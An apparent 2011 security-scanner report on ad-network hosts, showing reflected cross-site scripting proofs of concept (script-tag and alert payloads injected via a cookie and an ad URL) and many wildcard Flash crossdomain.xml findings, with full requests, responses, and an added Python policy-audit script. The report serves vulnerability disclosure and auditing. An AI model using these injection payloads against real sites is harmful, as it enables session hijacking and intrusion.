t language="Javascript">CollectiveMedia.createAndAttachAd("cm-35414998_1304955425","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-35414998_1304955425,11f8f328940989ed1063';alert(1)//73c0ac01910&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-35414
...[SNIP]...

2.162. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7108-2.html

Issue detail

The value of the ruid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2833e"><script>alert(1)</script>bf0f8f7e7b1 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /a/4462/5032/7108-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=2833e"><script>alert(1)</script>bf0f8f7e7b1; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=4462/5032; rdk2=0; ses2=12590^2&13549^1&5032^3; csi2=3187892.js^1^1304955417^1304955417&3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:28 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 09-May-2011 16:37:28 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 16:37:28 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1&5032^4; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=58951; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3164882.js^2^1304954981^1304955448&3187892.js^1^1304955417^1304955417&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 15:37:28 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 1479

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=2833e"><script>alert(1)</script>bf0f8f7e7b1" style="display: none;" border="0" height="1" width="1" alt=""/>
...[SNIP]...

3. Flash cross-domain policy
There are 81 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


3.1. http://a.collective-media.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Tue, 31 Aug 2010 17:41:28 GMT
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:36:58 GMT
Connection: close
Set-Cookie: JY57=CT; expires=Mon, 06-Jun-2011 15:36:58 GMT; path=/; domain=.collective-media.net
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

3.2. http://a1.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a1.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:17 GMT
Connection: close
Content-Length: 225

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.3. http://action.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: action.mathtag.com

Response

HTTP/1.1 200 OK
Set-Cookie: uuid=703ddf34-92af-425c-9096-a1b12a71ff71; path=/; expires=Thu, 08-May-2014 15:39:14 GMT; domain=.mathtag.com
Content-Type: text/xml
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 215
Date: Mon, 09 May 2011 15:39:14 GMT
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

3.4. http://ad.amgdgt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.amgdgt.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "85814f-12e-4871688bd9a00"
Cache-Control: max-age=21600
Expires: Mon, 09 May 2011 19:27:14 GMT
Content-Type: text/xml
Content-Length: 302
Date: Mon, 09 May 2011 15:35:20 GMT
X-Varnish: 1625213256 1625133942
Age: 7680
Via: 1.1 varnish
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

3.5. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 09 May 2011 15:35:02 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.6. http://ads.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:12e5"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:35:08 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.7. http://amch.questionmarket.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:02 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0686c83-d1-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=5, max=977
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

3.8. http://analytics.newsinc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: analytics.newsinc.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Mon, 09 May 2011 15:37:50 GMT
ETag: "b485279b64cb1:0"
Last-Modified: Tue, 05 Oct 2010 14:38:51 GMT
NDN-Server: Ana03
NDN-SiteVer: 3.0
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 286
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-ht
...[SNIP]...

3.9. http://ar.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:35:22 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

3.10. http://assets1.grouponcdn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets1.grouponcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: assets1.grouponcdn.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/xml
Accept-Ranges: bytes
Age: 253988
Date: Mon, 09 May 2011 15:35:37 GMT
Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT
Content-Length: 352
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" to-ports="80,443" secure="false" />
...[SNIP]...

3.11. http://at.amgdgt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and also lists one specific host. That second entry, allow-access-from domain="all", is not a keyword: Flash Player treats "all" as a literal hostname, so the entry is almost certainly a misconfiguration and in any case grants nothing beyond the wildcard entry above it.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Mon, 09 May 2011 21:35:46 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...
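The attributes that the findings in this section turn on can be checked mechanically rather than by eye. The script below is an added example and is not part of the original report or of any of the listed vendors' code. It parses a crossdomain.xml document with the Python standard library and reports the conditions seen in these findings: a wildcard allow-access-from, a site-control value of "all", secure="false" on a policy that was itself fetched over HTTPS (which lets SWFs loaded over plain http:// read the HTTPS host), a wildcard allow-http-request-headers-from, and the literal domain="all" entry seen in 3.11. The four sample policies are constructed to mirror the shapes captured in this section; the fetch_policy helper and its host argument are illustrative and are not exercised by the samples.

```python
"""Audit a Flash crossdomain.xml policy for the conditions flagged in this report.

Added example: not part of the original report or of any vendor's code.
Uses only the Python standard library.
"""
import xml.etree.ElementTree as ET
import urllib.request

# Constructed sample policies, modelled on the shapes seen in this section.
# A DOCTYPE pointing at the macromedia DTD is common; expat does not fetch it.
POLICY_WILDCARD_SITECONTROL = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="80,443" secure="false" />
</cross-domain-policy>"""

POLICY_LITERAL_ALL = """<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
</cross-domain-policy>"""

POLICY_HEADERS = """<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>"""

POLICY_RESTRICTED = """<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="www.example.com" to-ports="443"/>
</cross-domain-policy>"""


def audit_policy(xml_text, served_over_https=False):
    """Return a list of (severity, message) tuples for one policy document.

    served_over_https: whether the policy itself was fetched over https://.
    secure="false" only widens access when the policy host is HTTPS, because
    it then lets SWFs loaded over plain http:// read that HTTPS host.
    """
    if isinstance(xml_text, bytes):
        xml_text = xml_text.decode("utf-8-sig", "replace")
    # Strip a leading byte-order mark; some servers emit one before <?xml.
    xml_text = xml_text.lstrip("\ufeff")
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [("Info", "not a cross-domain-policy document: root is <%s>" % root.tag)]

    findings = []
    sc = root.find("site-control")
    if sc is not None and sc.get("permitted-cross-domain-policies") == "all":
        findings.append(("Medium", "site-control=all: any XML the host serves may act as a policy file"))

    for el in root.findall("allow-access-from"):
        domain = el.get("domain", "")
        ports = el.get("to-ports")
        secure = el.get("secure", "true").strip().lower()
        where = " to-ports=%s" % ports if ports else ""
        if domain == "*":
            findings.append(("High", "wildcard allow-access-from domain=*%s" % where))
        elif domain.startswith("*."):
            findings.append(("Medium", "subdomain wildcard allow-access-from domain=%s%s" % (domain, where)))
        elif domain == "all":
            # "all" is not a keyword here: it matches only a host literally named "all".
            findings.append(("Low", 'allow-access-from domain="all" is a literal hostname, not a wildcard (likely misconfiguration)'))
        if secure == "false" and served_over_https:
            findings.append(("Medium", "secure=false on domain=%s: http:// SWFs may read this https:// host" % domain))

    for el in root.findall("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            findings.append(("High", "wildcard allow-http-request-headers-from headers=%s" % el.get("headers", "")))
    return findings


def worst_severity(findings):
    """Highest severity present, or None for a clean policy."""
    order = {"High": 3, "Medium": 2, "Low": 1, "Info": 0}
    return max((sev for sev, _ in findings), key=order.get, default=None)


def fetch_policy(host, https=False, timeout=10):
    """Fetch /crossdomain.xml from a live host (network; not used by the samples)."""
    url = "%s://%s/crossdomain.xml" % ("https" if https else "http", host)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


if __name__ == "__main__":
    for name, text in [("wildcard+site-control", POLICY_WILDCARD_SITECONTROL),
                       ("literal all", POLICY_LITERAL_ALL),
                       ("headers", POLICY_HEADERS),
                       ("restricted", POLICY_RESTRICTED)]:
        result = audit_policy(text, served_over_https=True)
        print(name, worst_severity(result))
        for sev, msg in result:
            print("  [%s] %s" % (sev, msg))
```

Run against a live host with audit_policy(fetch_policy("example.invalid")); pass served_over_https=True when the policy was fetched over TLS, otherwise the secure attribute is not a finding on its own. The checker treats an absent secure attribute as "true", which is Flash Player's default.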

3.12. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 15:34:58 GMT
Date: Mon, 09 May 2011 15:34:58 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.13. http://b.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 10 May 2011 15:35:23 GMT
Date: Mon, 09 May 2011 15:35:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

3.14. http://b3.mookie1.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 17 Jun 2010 13:44:25 GMT
ETag: "1ff0231-d0-4893a095c6040"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

3.15. http://bh.contextweb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190951000"
Last-Modified: Thu, 15 Jul 2010 10:49:11 GMT
Content-Type: application/xml
Content-Length: 384
Date: Mon, 09 May 2011 15:39:18 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.16. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 15:38:51 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


3.17. http://cache-01.cleanprint.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache-01.cleanprint.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache-01.cleanprint.net

Response

HTTP/1.0 200 OK
Server: None
ETag: "cb-43afa3566b0c0"
Accept-Ranges: bytes
X-Server: FD-02
Vary: Accept-Encoding
Content-Type: application/xml
Content-Language: en
Age: 480
Date: Mon, 09 May 2011 15:37:23 GMT
Last-Modified: Tue, 25 Sep 2007 18:50:19 GMT
Content-Length: 203
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

3.18. http://cdn.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Length: 355
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 14:23:28 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
x-server: web101
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Mon, 09 May 2011 15:36:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

3.19. http://cdn.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.interclick.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:26 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n7 ( iad-agg-n12), rf-ht iad-agg-n12 ( origin>CONN)
ETag: "7b643f1dafecb1:0"
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 15:36:27 GMT
